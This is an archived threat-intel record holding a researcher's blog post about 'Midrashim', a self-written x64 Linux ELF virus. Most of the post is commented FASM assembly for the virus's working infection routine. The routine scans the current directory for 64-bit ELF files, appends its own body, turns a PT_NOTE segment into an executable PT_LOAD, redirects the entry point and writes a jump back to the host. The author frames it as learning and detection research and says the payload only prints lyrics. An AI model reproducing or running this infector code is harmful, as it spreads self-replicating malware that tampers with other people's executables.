{
	"id": "d32baecc-f7db-4f1d-8c6d-47797225bca0",
	"created_at": "2026-04-06T00:14:01.408003Z",
	"updated_at": "2026-04-10T03:21:32.822347Z",
	"deleted_at": null,
	"sha1_hash": "38b38d61e5825f3739ff3061ed21e5b52c426d5a",
	"title": "Linux.Midrashim: Assembly x64 ELF virus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 232983,
	"plain_text": "Linux.Midrashim: Assembly x64 ELF virus\r\nBy Guilherme Thomazi\r\nPublished: 2021-01-18 · Archived: 2026-04-05 23:15:41 UTC\r\nOverview\r\nMy interest in Assembly language started when I was a kid, mainly because of computer viruses of the DOS era.\r\nI’ve spent countless hours contemplating my first humble collection of source codes and samples (you can find it\r\nat https://github.com/guitmz/virii) and to me, it’s cool how flexible and creative one can get with Assembly, even\r\nif its learning curve is steep.\r\nI’m an independant malware researcher and wrote this virus to learn and have fun, expanding my knowledge on\r\nthe several ELF attack/defense techniques and Assembly in general.\r\nThe code does not implement any evasion techniques and detection is trivial. Samples were also shared with a few\r\nmajor Antivirus companies prior to the release of this code and signatures were created, such as\r\nLinux/Midrashim.A by ESET. I’m also working on a vaccine which will be available at a later date. I’ll update\r\nthis post when it’s ready.\r\nThe payload is not destructive, as usual. It just prints the harmless lyrics of Ozar Midrashim song to stdout and\r\nthe layout of an infected file is the following (full image):\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 1 of 12\n\nHow it works\r\nMidrashim is a 64 bits Linux infector that targets ELF files in the current directory (non recursively). It relies on\r\nthe well known PT_NOTE -\u003e PT_LOAD infection technique and should work on regular and position independent\r\nbinaries. This method has a high success rate and it’s easy to implement (and detect). Read more about it here.\r\nIt will not work on Golang executables, because those need the PT_NOTE segment to run properly (infection\r\nworks, but infected file will segfault after virus execution).\r\nFor simplicity’s sake, it makes use of pread64 and pwrite64 to read/write specific locations in the target file when\r\nit should use mmap instead, for flexibility and reliability. A few other things could be improved too, like detecting\r\nfirst virus execution with a better approach and more error handling to minimize pitfalls.\r\nI had so many ideas for the payload of Midrashim, from inspiration I got from projects at http://www.pouet.net/ to\r\ncontrolling the terminal with ANSI escape codes (more on that here - which is something I wrote with Midrashim\r\nin mind).\r\nDue to lack of free time and given the complexity of implementing such things in Assembly, specially in a code of\r\nthis nature, I ended up with something simpler and will probably revisit this subject on a future project.\r\nCode\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 2 of 12\n\nThis is my first full assembly infector and should be assembled with FASM x64. Its core functionality consists of:\r\nReserving space on stack to store values in memory\r\nChecking if its virus first run (displays a different payload message if running for the first time)\r\nOpen current directory for reading\r\nLoop through files in the directory, checking for targets for infection\r\nTry to infect target file\r\nContinue looping the directory until no more infection targets are available, then exit\r\nFull code with comments is available at https://github.com/guitmz/midrashim and we’ll now go over each step\r\nabove with a bit more detail.\r\nIf you need help understanding Linux system calls parameters, feel free to visit my new (work in progress)\r\nwebsite: https://syscall.sh\r\nThe secret of getting ahead is getting started\r\nFor the stack buffer, I used r15 register and added the comments below for reference when browsing the code.\r\nNote the values, for example, the ELF header, which is 64 bytes long. Since r15 + 144 represents its start, it\r\nshould end at r15 + 207 . The values in between are also accounted for, like ehdr.entry that starts at r15 +\r\n168 , which is 8 bytes long, ends at r15 + 175 .\r\n; r15 + 0 = stack buffer = stat\r\n; r15 + 48 = stat.st_size\r\n; r15 + 144 = ehdr\r\n; r15 + 148 = ehdr.class\r\n; r15 + 152 = ehdr.pad\r\n; r15 + 168 = ehdr.entry\r\n; r15 + 176 = ehdr.phoff\r\n; r15 + 198 = ehdr.phentsize\r\n; r15 + 200 = ehdr.phnum\r\n; r15 + 208 = phdr = phdr.type\r\n; r15 + 212 = phdr.flags\r\n; r15 + 216 = phdr.offset\r\n; r15 + 224 = phdr.vaddr\r\n; r15 + 232 = phdr.paddr\r\n; r15 + 240 = phdr.filesz\r\n; r15 + 248 = phdr.memsz\r\n; r15 + 256 = phdr.align\r\n; r15 + 300 = jmp rel\r\n; r15 + 350 = directory size\r\n; r15 + 400 = dirent = dirent.d_ino\r\n; r15 + 416 = dirent.d_reclen\r\n; r15 + 418 = dirent.d_type\r\n; r15 + 419 = dirent.d_name\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 3 of 12\n\n; r15 + 3000 = first run control flag\r\n; r15 + 3001 = decoded payload\r\nReserving stack space is easy, there are different ways of doing it, one is to subtract from rsp , then just store it\r\nin r15 . Also right on start, we store argv0 to r14 (it’s going to be needed next) and we push rdx and rsp ,\r\nwhich need to be restored before the end of virus execution, so the infected file can run properly.\r\nv_start:\r\n mov r14, [rsp + 8] ; saving argv0 to r14\r\n push rdx\r\n push rsp\r\n sub rsp, 5000 ; reserving 5000 bytes\r\n mov r15, rsp ; r15 has the reserved stack buffer address\r\nTo check for the virus first execution, we get argv0 size in bytes and compare to the final virus size, which was\r\nstored in V_SIZE . If greater, it’s not the first run and we set a control value into a place in the stack buffer for\r\nlater use. This was a last minute addition that it’s not great (but pretty easy to implement and rather obvious).\r\ncheck_first_run:\r\n mov rdi, r14 ; argv0 to rdi\r\n mov rsi, O_RDONLY\r\n xor rdx, rdx ; not using any flags\r\n mov rax, SYS_OPEN\r\n syscall ; rax contains the argv0 fd\r\n mov rdi, rax\r\n mov rsi, r15 ; rsi = r15 = stack buffer address\r\n mov rax, SYS_FSTAT ; getting argv0 size in bytes\r\n syscall ; stat.st_size = [r15 + 48]\r\n \r\n cmp qword [r15 + 48], V_SIZE ; compare argv0 size with virus size\r\n jg load_dir ; if greater, not first run, continue infecting without setting control\r\n \r\n mov byte [r15 + 3000], FIRST_RUN ; set the control flag to [r15 + 3000] to represent virus first executio\r\nThe Wild Hunt\r\nWe need to find targets to infect. For that we’ll open the current directory for reading using getdents64 syscall,\r\nwhich will return the number of entries in it. That goes into the stack buffer.\r\nload_dir:\r\n push \".\" ; pushing \".\" to stack (rsp)\r\n mov rdi, rsp ; moving \".\" to rdi\r\n mov rsi, O_RDONLY\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 4 of 12\n\nxor rdx, rdx ; not using any flags\r\n mov rax, SYS_OPEN\r\n syscall ; rax contains the fd\r\n pop rdi\r\n cmp rax, 0 ; if can't open file, exit now\r\n jbe v_stop\r\n \r\n mov rdi, rax ; move fd to rdi\r\n lea rsi, [r15 + 400] ; rsi = dirent = [r15 + 400]\r\n mov rdx, DIRENT_BUFSIZE ; buffer with maximum directory size\r\n mov rax, SYS_GETDENTS64\r\n syscall ; dirent contains the directory entries\r\n \r\n test rax, rax ; check directory list was successful\r\n js v_stop ; if negative code is returned, I failed and should exit\r\n \r\n mov qword [r15 + 350], rax ; [r15 + 350] now holds directory size\r\n \r\n mov rax, SYS_CLOSE ; close source fd in rdi\r\n syscall\r\n \r\n xor rcx, rcx ; will be the position in the directory entries\r\nNow the hunt gets a little more… wild, as we loop through each file from directory listing we just performed.\r\nSteps performed:\r\nOpen target file\r\nValidate that it’s an ELF and 64 bits (by verifying its magic number and class information from its header)\r\nCheck if already infected (by looking for the infection mark that should be set in ehdr.pad ) and\r\nif yes, move to next file, until all files in the directory are checked\r\nIf not, loop through the target Program Headers, looking for a PT_NOTE section, starting the\r\ninfection process upon finding it\r\nfile_loop:\r\n push rcx ; preserving rcx\r\n cmp byte [rcx + r15 + 418], DT_REG ; check if it's a regular file dirent.d_type = [r15 + 418]\r\n jne .continue ; if not, proceed to next file\r\n .open_target_file:\r\n lea rdi, [rcx + r15 + 419] ; dirent.d_name = [r15 + 419]\r\n mov rsi, O_RDWR\r\n xor rdx, rdx ; not using any flags\r\n mov rax, SYS_OPEN\r\n syscall\r\n \r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 5 of 12\n\ncmp rax, 0 ; if can't open file, exit now\r\n jbe .continue\r\n mov r9, rax ; r9 contains target fd\r\n \r\n .read_ehdr:\r\n mov rdi, r9 ; r9 contains fd\r\n lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144]\r\n mov rdx, EHDR_SIZE ; ehdr.size\r\n mov r10, 0 ; read at offset 0\r\n mov rax, SYS_PREAD64\r\n syscall\r\n \r\n .is_elf:\r\n cmp dword [r15 + 144], 0x464c457f ; 0x464c457f means .ELF (little-endian)\r\n jnz .close_file ; not an ELF binary, close and continue to next file if any\r\n \r\n .is_64:\r\n cmp byte [r15 + 148], ELFCLASS64 ; check if target ELF is 64bit\r\n jne .close_file ; skipt it if not\r\n \r\n .is_infected:\r\n cmp dword [r15 + 152], 0x005a4d54 ; check signature in [r15 + 152] ehdr.pad (TMZ in little-endian,\r\n jz .close_file ; already infected, close and continue to next file if any\r\n \r\n mov r8, [r15 + 176] ; r8 now holds ehdr.phoff from [r15 + 176]\r\n xor rbx, rbx ; initializing phdr loop counter in rbx\r\n xor r14, r14 ; r14 will hold phdr file offset\r\n \r\n .loop_phdr:\r\n mov rdi, r9 ; r9 contains fd\r\n lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208]\r\n mov dx, word [r15 + 198] ; ehdr.phentsize is at [r15 + 198]\r\n mov r10, r8 ; read at ehdr.phoff from r8 (incrementing ehdr.phentsize each lo\r\n mov rax, SYS_PREAD64\r\n syscall\r\n \r\n cmp byte [r15 + 208], PT_NOTE ; check if phdr.type in [r15 + 208] is PT_NOTE (4)\r\n jz .infect ; if yes, start infecting\r\n \r\n inc rbx ; if not, increase rbx counter\r\n cmp bx, word [r15 + 200] ; check if we looped through all phdrs already (ehdr.phnum = [r15\r\n jge .close_file ; exit if no valid phdr for infection was found\r\n \r\n add r8w, word [r15 + 198] ; otherwise, add current ehdr.phentsize from [r15 + 198] into r8w\r\n jnz .loop_phdr ; read next phdr\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 6 of 12\n\nReproductive System 101\r\nDid I already mention it was going to get wild? Just kidding, it’s not really that complicated, just long. It goes like\r\nthis:\r\nAppend the virus code ( v_stop - v_start ) to the target end of file. These offsets will change during\r\ndifferent virus executions, so I’m using an old technique that calculates the delta memory offset using the\r\ncall instruction and the value of rbp during runtime\r\n.infect:\r\n .get_target_phdr_file_offset:\r\n mov ax, bx ; loading phdr loop counter bx to ax\r\n mov dx, word [r15 + 198] ; loading ehdr.phentsize from [r15 + 198] to dx\r\n imul dx ; bx * ehdr.phentsize\r\n mov r14w, ax\r\n add r14, [r15 + 176] ; r14 = ehdr.phoff + (bx * ehdr.phentsize)\r\n .file_info:\r\n mov rdi, r9\r\n mov rsi, r15 ; rsi = r15 = stack buffer address\r\n mov rax, SYS_FSTAT\r\n syscall ; stat.st_size = [r15 + 48]\r\n \r\n .append_virus:\r\n ; getting target EOF\r\n mov rdi, r9 ; r9 contains fd\r\n mov rsi, 0 ; seek offset 0\r\n mov rdx, SEEK_END\r\n mov rax, SYS_LSEEK\r\n syscall ; getting target EOF offset in rax\r\n push rax ; saving target EOF\r\n \r\n call .delta ; the age old trick\r\n .delta:\r\n pop rbp\r\n sub rbp, .delta\r\n \r\n ; writing virus body to EOF\r\n mov rdi, r9 ; r9 contains fd\r\n lea rsi, [rbp + v_start] ; loading v_start address in rsi\r\n mov rdx, v_stop - v_start ; virus size\r\n mov r10, rax ; rax contains target EOF offset from previous syscall\r\n mov rax, SYS_PWRITE64\r\n syscall\r\n \r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 7 of 12\n\ncmp rax, 0\r\n jbe .close_file\r\nPatching the target PT_NOTE segment\r\nAdjust its type, making it a PT_LOAD\r\nChange its flags (making it executable)\r\nUpdate its phdr.vaddr to point to the virus start ( 0xc000000 + stat.st_size )\r\nAccount for virus size on phdr.filesz and phdr.memsz\r\nKeep proper alignment\r\n.patch_phdr:\r\n mov dword [r15 + 208], PT_LOAD ; change phdr type in [r15 + 208] from PT_NOTE to PT_LOAD (1\r\n mov dword [r15 + 212], PF_R or PF_X ; change phdr.flags in [r15 + 212] to PF_X (1) | PF_R (4)\r\n pop rax ; restoring target EOF offeset into rax\r\n mov [r15 + 216], rax ; phdr.offset [r15 + 216] = target EOF offset\r\n mov r13, [r15 + 48] ; storing target stat.st_size from [r15 + 48] in r13\r\n add r13, 0xc000000 ; adding 0xc000000 to target file size\r\n mov [r15 + 224], r13 ; changing phdr.vaddr in [r15 + 224] to new one in r13 (stat\r\n mov qword [r15 + 256], 0x200000 ; set phdr.align in [r15 + 256] to 2mb\r\n add qword [r15 + 240], v_stop - v_start + 5 ; add virus size to phdr.filesz in [r15 + 240] + 5 for the j\r\n add qword [r15 + 248], v_stop - v_start + 5 ; add virus size to phdr.memsz in [r15 + 248] + 5 for the jm\r\n ; writing patched phdr\r\n mov rdi, r9 ; r9 contains fd\r\n mov rsi, r15 ; rsi = r15 = stack buffer address\r\n lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208]\r\n mov dx, word [r15 + 198] ; ehdr.phentsize from [r15 + 198]\r\n mov r10, r14 ; phdr from [r15 + 208]\r\n mov rax, SYS_PWRITE64\r\n syscall\r\n \r\n cmp rax, 0\r\n jbe .close_file\r\nPatching the ELF header\r\nSave original entrypoint for later in r14\r\nUpdate entrypoint to be the same as the patched segment virtual address ( phdr.vaddr )\r\nAdd infection marker string to ehdr.pad\r\n.patch_ehdr:\r\n ; patching ehdr\r\n mov r14, [r15 + 168] ; storing target original ehdr.entry from [r15 + 168] in r14\r\n mov [r15 + 168], r13 ; set ehdr.entry in [r15 + 168] to r13 (phdr.vaddr)\r\n mov r13, 0x005a4d54 ; loading virus signature into r13 (TMZ in little-endian)\r\n mov [r15 + 152], r13 ; adding the virus signature to ehdr.pad in [r15 + 152]\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 8 of 12\n\n; writing patched ehdr\r\n mov rdi, r9 ; r9 contains fd\r\n lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144]\r\n mov rdx, EHDR_SIZE ; ehdr.size\r\n mov r10, 0 ; ehdr.offset\r\n mov rax, SYS_PWRITE64\r\n syscall\r\n \r\n cmp rax, 0\r\n jbe .close_file\r\nThose who don’t jump will never fly\r\nDeep, right? That’s exacly what we got to do, jump back to the original target entrypoint to continue the host\r\nexecution.\r\nWe’ll use a relative jump, which is represented by the e9 opcode with a with a 32 bit offset, making the whole\r\ninstruction 5 bytes long ( e9 00 00 00 00 ).\r\nTo create this instruction, we use the following formula, considering the patched phdr.vaddr from before:\r\nnewEntryPoint = originalEntryPoint - (phdr.vaddr + 5) - virus_size\r\nThere’s no secret here, we need to write this instruction to the very end of the file, after the recenty added virus\r\nbody.\r\n.write_patched_jmp:\r\n ; getting target new EOF\r\n mov rdi, r9 ; r9 contains fd\r\n mov rsi, 0 ; seek offset 0\r\n mov rdx, SEEK_END\r\n mov rax, SYS_LSEEK\r\n syscall ; getting target EOF offset in rax\r\n ; creating patched jmp\r\n mov rdx, [r15 + 224] ; rdx = phdr.vaddr\r\n add rdx, 5\r\n sub r14, rdx\r\n sub r14, v_stop - v_start\r\n mov byte [r15 + 300 ], 0xe9\r\n mov dword [r15 + 301], r14d\r\n \r\n ; writing patched jmp to EOF\r\n mov rdi, r9 ; r9 contains fd\r\n lea rsi, [r15 + 300] ; rsi = patched jmp in stack buffer = [r15 + 208]\r\n mov rdx, 5 ; size of jmp rel\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 9 of 12\n\nmov r10, rax ; mov rax to r10 = new target EOF\r\n mov rax, SYS_PWRITE64\r\n syscall\r\n \r\n cmp rax, 0\r\n jbe .close_file\r\n \r\n mov rax, SYS_SYNC ; commiting filesystem caches to disk\r\n syscall\r\nPayload’s on the way\r\nWe’re almost done here, phew! The final bits of code will take care of displaying the text payload to the screen.\r\nWe check if it’s the virus first run (which means it’s not running from inside an infected file) and in case\r\nthis is true, we print a message to the screen and exit\r\nIf not the first run, we print a different message to the screen, which is encoded using xor and add\r\ninstructions. The purpose of this was to prevent the string from showing up in the binary as plain text\r\ncmp byte [r15 + 3000], FIRST_RUN ; checking if custom control flag we set earlier indi\r\njnz infected_run ; if control flag != 1, it should be running from an i\r\n call show_msg ; if control flag == 1, assume virus is being executed\r\n info_msg:\r\n db 'Midrashim by TMZ (c) 2020', 0xa ; not the nicest approach like I mentioned before but\r\n info_len = $-info_msg\r\n show_msg:\r\n pop rsi ; info_msg address to rsi\r\n mov rax, SYS_WRITE\r\n mov rdi, STDOUT ; display payload\r\n mov rdx, info_len\r\n syscall\r\n jmp cleanup ; cleanup and exit\r\ninfected_run:\r\n ; 1337 encoded payload, very hax0r\r\n call payload\r\n msg:\r\n ; payload first part\r\n db 0x59, 0x7c, 0x95, 0x95, 0x57, 0x9e, 0x9d, 0x57\r\n db 0xa3, 0x9f, 0x92, 0x57, 0x93, 0x9e, 0xa8, 0xa3\r\n db 0x96, 0x9d, 0x98, 0x92, 0x57, 0x7e, 0x57, 0x98\r\n db 0x96, 0x9d, 0x57, 0xa8, 0x92, 0x92, 0x57, 0x96\r\n ...\r\n len = $-msg\r\n payload:\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 10 of 12\n\npop rsi ; setting up decoding loop\r\n mov rcx, len\r\n lea rdi, [r15 + 3001]\r\n .decode:\r\n lodsb ; load byte from rsi into al\r\n sub al, 50 ; decoding it\r\n xor al, 5\r\n stosb ; store byte from al into rdi\r\n loop .decode ; sub 1 from rcx and continue loop until rcx = 0\r\n \r\n lea rsi, [r15 + 3001] ; decoded payload is at [r15 + 3000]\r\n mov rax, SYS_WRITE\r\n mov rdi, STDOUT ; display payload\r\n mov rdx, len\r\n syscall\r\nDemo\r\n \r\n[guitmz@vps midrashim]$ cat target.c\r\n#include \u003cstdio.h\u003e\r\n \r\nint main() {\r\n printf(\"I am the target!\\n\");\r\n return 0;\r\n}\r\n[guitmz@vps midrashim]$ gcc target.c -o target\r\n[guitmz@vps midrashim]$ gcc -pie -fPIC target.c -o target2\r\n[guitmz@vps midrashim]$ file target\r\ntarget: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=f20036dd702fa2723c4315bcf90c5af94b138aa8, not stripped\r\n[guitmz@vps midrashim]$ file target2\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nOutro\r\nThis ended up being one of my longest projects. I remember coming back to it multiple times during a period of\r\nmonths, sometimes because I was stuck and had to do research and, other times, the Assembly logic fell into\r\noblivion and took me a moment to get back on track with my thoughts.\r\nMany consider Assembly and ELF injection an art form (myself included) and over the decades, new techniques\r\nwere developed and improved. It’s essential to talk about these and share the knowledge in order to improve the\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 11 of 12\n\ndetection of threat actors, which are starting to realize more and more that Linux seems to not be yet a priority of\r\nsecurity companies.\r\nIn the end, it was one of the most fun and rewarding codes I ever wrote, albeit not really being one of the best.\r\nTMZ\r\nSource: https://www.guitmz.com/linux-midrashim-elf-virus/\r\nhttps://www.guitmz.com/linux-midrashim-elf-virus/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.guitmz.com/linux-midrashim-elf-virus/"
	],
	"report_names": [
		"linux-midrashim-elf-virus"
	],
	"threat_actors": [],
	"ts_created_at": 1775434441,
	"ts_updated_at": 1775791292,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/38b38d61e5825f3739ff3061ed21e5b52c426d5a.pdf",
		"text": "https://archive.orkl.eu/38b38d61e5825f3739ff3061ed21e5b52c426d5a.txt",
		"img": "https://archive.orkl.eu/38b38d61e5825f3739ff3061ed21e5b52c426d5a.jpg"
	}
}